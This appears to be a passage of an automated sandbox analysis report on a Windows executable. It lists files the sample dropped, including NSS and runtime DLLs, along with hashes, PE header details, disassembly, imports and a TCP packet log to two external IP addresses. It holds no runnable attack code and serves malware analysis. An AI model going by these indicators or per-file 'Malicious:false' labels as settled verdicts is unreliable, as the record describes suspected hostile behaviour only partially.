                                                                                                                                            SSDEEP:3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
                                                                                                                                            MD5:A2EE53DE9167BF0D6C019303B7CA84E5
                                                                                                                                            SHA1:2A3C737FA1157E8483815E98B666408A18C0DB42
                                                                                                                                            SHA-256:43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
                                                                                                                                            SHA-512:45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):334288
                                                                                                                                            Entropy (8bit):6.807000203861606
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
                                                                                                                                            MD5:EF2834AC4EE7D6724F255BEAF527E635
                                                                                                                                            SHA1:5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
                                                                                                                                            SHA-256:A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
                                                                                                                                            SHA-512:C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\nss3[1].dll
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1246160
                                                                                                                                            Entropy (8bit):6.765536416094505
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
                                                                                                                                            MD5:BFAC4E3C5908856BA17D41EDCD455A51
                                                                                                                                            SHA1:8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
                                                                                                                                            SHA-256:E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
                                                                                                                                            SHA-512:2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\vcruntime140[1].dll
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):83784
                                                                                                                                            Entropy (8bit):6.890347360270656
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                                                                                            MD5:7587BF9CB4147022CD5681B015183046
                                                                                                                                            SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                                                                                            SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                                                                                            SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\msvcp140[1].dll
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):440120
                                                                                                                                            Entropy (8bit):6.652844702578311
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                                                                                            MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                                                                                            SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                                                                                            SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                                                                                            SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):7.855560391702203
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                            • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • VXD Driver (31/22) 0.00%
                                                                                                                                            File name:T6zZFfRLqs.exe
                                                                                                                                            File size:599552
                                                                                                                                            MD5:5d5e83e151a99bed97e13839e8881cb5
                                                                                                                                            SHA1:4f008fe578e0f32ed5dda8d30883a900630f1be4
                                                                                                                                            SHA256:1a0f891e8d7d659d550b35c54f542180cd2629d3a62e35e695e43fd1f5dad0b3
                                                                                                                                            SHA512:23705b79eac9d8725a1f366ba685664345d5dbca951d82b2fd554efde68d7fc038180e26329adaf43ac693b84c292ab12585237433c0c4e085c0f785cb43506b
                                                                                                                                            SSDEEP:12288:SzcmwRLNj6Jfko71uwBo2Uk3XezXUlCte2XMuOb27Wcpg:SzbwRLNj6J771/Bo9JtNTOC7
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L..

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:e0e4e8beb0e4c8ea

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x401b2c
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                            Time Stamp:0x5FC5E9BE [Tue Dec 1 06:59:10 2020 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:5
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:5
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:5
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:f98cc9327e2d65cc6189a693f26e1c1d

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            call 00007F914CC4AB9Ch
                                                                                                                                            jmp 00007F914CC47FADh
                                                                                                                                            mov edi, edi
                                                                                                                                            push ebp
                                                                                                                                            mov ebp, esp
                                                                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                                                                            xor ecx, ecx
                                                                                                                                            cmp eax, dword ptr [00488008h+ecx*8]
                                                                                                                                            je 00007F914CC48145h
                                                                                                                                            inc ecx
                                                                                                                                            cmp ecx, 2Dh
                                                                                                                                            jc 00007F914CC48123h
                                                                                                                                            lea ecx, dword ptr [eax-13h]
                                                                                                                                            cmp ecx, 11h
                                                                                                                                            jnbe 00007F914CC48140h
                                                                                                                                            push 0000000Dh
                                                                                                                                            pop eax
                                                                                                                                            pop ebp
                                                                                                                                            ret
                                                                                                                                            mov eax, dword ptr [0048800Ch+ecx*8]
                                                                                                                                            pop ebp
                                                                                                                                            ret
                                                                                                                                            add eax, FFFFFF44h
                                                                                                                                            push 0000000Eh
                                                                                                                                            pop ecx
                                                                                                                                            cmp ecx, eax
                                                                                                                                            sbb eax, eax
                                                                                                                                            and eax, ecx
                                                                                                                                            add eax, 08h
                                                                                                                                            pop ebp
                                                                                                                                            ret
                                                                                                                                            call 00007F914CC4A801h
                                                                                                                                            test eax, eax
                                                                                                                                            jne 00007F914CC48138h
                                                                                                                                            mov eax, 00488170h
                                                                                                                                            ret
                                                                                                                                            add eax, 08h
                                                                                                                                            ret
                                                                                                                                            call 00007F914CC4A7EEh
                                                                                                                                            test eax, eax
                                                                                                                                            jne 00007F914CC48138h
                                                                                                                                            mov eax, 00488174h
                                                                                                                                            ret
                                                                                                                                            add eax, 0Ch
                                                                                                                                            ret
                                                                                                                                            mov edi, edi
                                                                                                                                            push ebp
                                                                                                                                            mov ebp, esp
                                                                                                                                            push esi
                                                                                                                                            call 00007F914CC48117h
                                                                                                                                            mov ecx, dword ptr [ebp+08h]
                                                                                                                                            push ecx
                                                                                                                                            mov dword ptr [eax], ecx
                                                                                                                                            call 00007F914CC480B7h
                                                                                                                                            pop ecx
                                                                                                                                            mov esi, eax
                                                                                                                                            call 00007F914CC480F1h
                                                                                                                                            mov dword ptr [eax], esi
                                                                                                                                            pop esi
                                                                                                                                            pop ebp
                                                                                                                                            ret
                                                                                                                                            push 0000000Ch
                                                                                                                                            push 004865D8h
                                                                                                                                            call 00007F914CC48EBCh
                                                                                                                                            mov ecx, dword ptr [ebp+08h]
                                                                                                                                            xor edi, edi
                                                                                                                                            cmp ecx, edi
                                                                                                                                            jbe 00007F914CC48160h
                                                                                                                                            push FFFFFFE0h
                                                                                                                                            pop eax
                                                                                                                                            xor edx, edx
                                                                                                                                            div ecx
                                                                                                                                            cmp eax, dword ptr [ebp+0Ch]
                                                                                                                                            sbb eax, eax
                                                                                                                                            inc eax
                                                                                                                                            jne 00007F914CC48151h
                                                                                                                                            call 00007F914CC480C3h
                                                                                                                                            mov dword ptr [eax], 0000000Ch
                                                                                                                                            push edi
                                                                                                                                            push edi
                                                                                                                                            push edi

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x871a00x50.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8692c0x3c.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x10e0000xa8f0.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x841c00x1c.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x854800x40.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x840000x17c.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                            Sections

                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x10000x826600x82800False0.975634578544data7.9868866426IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                            .rdata0x840000x31f00x3200False0.256953125data4.156391323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .data0x880000x8557c0x1e00False0.117708333333data1.31907716101IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                            .rsrc0x10e0000xa8f00xaa00False0.668910845588data6.07126830195IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                            Resources

                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                            RT_ICON0x10e3f00xea8dataEnglishUnited States
                                                                                                                                            RT_ICON0x10f2980x8a8dataEnglishUnited States
                                                                                                                                            RT_ICON0x10fb400x6c8dataEnglishUnited States
                                                                                                                                            RT_ICON0x1102080x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                            RT_ICON0x1107700x25a8dataEnglishUnited States
                                                                                                                                            RT_ICON0x112d180x10a8dataEnglishUnited States
                                                                                                                                            RT_ICON0x113dc00x988dataEnglishUnited States
                                                                                                                                            RT_ICON0x1147480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                            RT_ICON0x114c280x6c8dataEnglishUnited States
                                                                                                                                            RT_ICON0x1152f00x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                            RT_ICON0x1158580x25a8dataEnglishUnited States
                                                                                                                                            RT_ICON0x117e000x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                            RT_STRING0x1184c80x424data
                                                                                                                                            RT_ACCELERATOR0x1182a80x50data
                                                                                                                                            RT_ACCELERATOR0x1182f80x20data
                                                                                                                                            RT_GROUP_ICON0x1182680x3edataEnglishUnited States
                                                                                                                                            RT_GROUP_ICON0x114bb00x76dataEnglishUnited States
                                                                                                                                            RT_VERSION0x1183180x1b0data

                                                                                                                                            Imports

                                                                                                                                            DLLImport
                                                                                                                                            KERNEL32.dllHeapReAlloc, GetLocaleInfoA, LoadResource, InterlockedIncrement, GetEnvironmentStringsW, AddConsoleAliasW, SetEvent, OpenSemaphoreA, GetSystemTimeAsFileTime, GetCommandLineA, WriteFileGather, CreateActCtxW, GetEnvironmentStrings, LeaveCriticalSection, GetFileAttributesA, ReadFile, GetDevicePowerState, GetProcAddress, FreeUserPhysicalPages, VerLanguageNameW, WriteConsoleA, GetProcessId, LocalAlloc, RemoveDirectoryW, GlobalGetAtomNameW, WaitForMultipleObjects, EnumResourceTypesW, GetModuleFileNameA, GetModuleHandleA, EraseTape, GetStringTypeW, ReleaseMutex, EndUpdateResourceA, LocalSize, FindFirstVolumeW, FindNextVolumeA, lstrcpyW, HeapAlloc, GetStartupInfoA, DeleteCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, GetLastError, SetFilePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, CloseHandle, CreateFileA
                                                                                                                                            USER32.dllGetCursorPos

                                                                                                                                            Exports

                                                                                                                                            NameOrdinalAddress
                                                                                                                                            @SetViceVariants@1210x401000

                                                                                                                                            Version Infos

                                                                                                                                            DescriptionData
                                                                                                                                            InternalNamesajbmiamezu.ise
                                                                                                                                            ProductVersion8.64.59.5
                                                                                                                                            CopyrightCopyrighz (C) 2021, fudkagat
                                                                                                                                            Translation0x0127 0x0081

                                                                                                                                            Possible Origin

                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                            EnglishUnited States

                                                                                                                                            Network Behavior

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Sep 27, 2021 18:33:07.443809986 CEST49740443192.168.2.688.99.75.82
                                                                                                                                            Sep 27, 2021 18:33:07.443856001 CEST4434974088.99.75.82192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:07.444000959 CEST49740443192.168.2.688.99.75.82
                                                                                                                                            Sep 27, 2021 18:33:07.460839033 CEST49740443192.168.2.688.99.75.82
                                                                                                                                            Sep 27, 2021 18:33:07.460875988 CEST4434974088.99.75.82192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:07.565421104 CEST4434974088.99.75.82192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:07.565608025 CEST49740443192.168.2.688.99.75.82
                                                                                                                                            Sep 27, 2021 18:33:07.958369970 CEST49740443192.168.2.688.99.75.82
                                                                                                                                            Sep 27, 2021 18:33:07.958401918 CEST4434974088.99.75.82192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:07.958719015 CEST4434974088.99.75.82192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:07.958815098 CEST49740443192.168.2.688.99.75.82
                                                                                                                                            Sep 27, 2021 18:33:07.965439081 CEST49740443192.168.2.688.99.75.82
                                                                                                                                            Sep 27, 2021 18:33:08.011140108 CEST4434974088.99.75.82192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.082767010 CEST4434974088.99.75.82192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.082796097 CEST4434974088.99.75.82192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.082823038 CEST4434974088.99.75.82192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.082938910 CEST49740443192.168.2.688.99.75.82
                                                                                                                                            Sep 27, 2021 18:33:08.082959890 CEST4434974088.99.75.82192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.082993031 CEST49740443192.168.2.688.99.75.82
                                                                                                                                            Sep 27, 2021 18:33:08.083030939 CEST49740443192.168.2.688.99.75.82
                                                                                                                                            Sep 27, 2021 18:33:08.086275101 CEST49740443192.168.2.688.99.75.82
                                                                                                                                            Sep 27, 2021 18:33:08.086297035 CEST4434974088.99.75.82192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.215325117 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.236507893 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.236700058 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.238046885 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.259089947 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.345690012 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.345793962 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.349280119 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.370603085 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370640993 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370665073 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370692968 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370757103 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370780945 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370784998 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.370839119 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370863914 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.370867968 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370894909 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370958090 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.370973110 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.370985985 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.371002913 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.371045113 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.392576933 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.392616034 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.392640114 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.392663956 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.392729998 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.392772913 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.392846107 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393013000 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393030882 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393075943 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393130064 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393157959 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393182039 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393208027 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393208027 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393235922 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393259048 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393260002 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393282890 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393285036 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393310070 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393315077 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393340111 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393341064 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393364906 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393373966 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393389940 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393412113 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393414974 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393440008 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393460035 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393484116 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393491983 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393507957 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.393534899 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.393564939 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.413825035 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.413858891 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.413882971 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.413907051 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.413918018 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.413963079 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.414007902 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.414032936 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.414086103 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.414093018 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.414124012 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.414138079 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.414150000 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.414172888 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.414175987 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.414197922 CEST4974180192.168.2.623.88.105.196
                                                                                                                                            Sep 27, 2021 18:33:08.414202929 CEST804974123.88.105.196192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:08.414218903 CEST4974180192.168.2.623.88.105.196

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
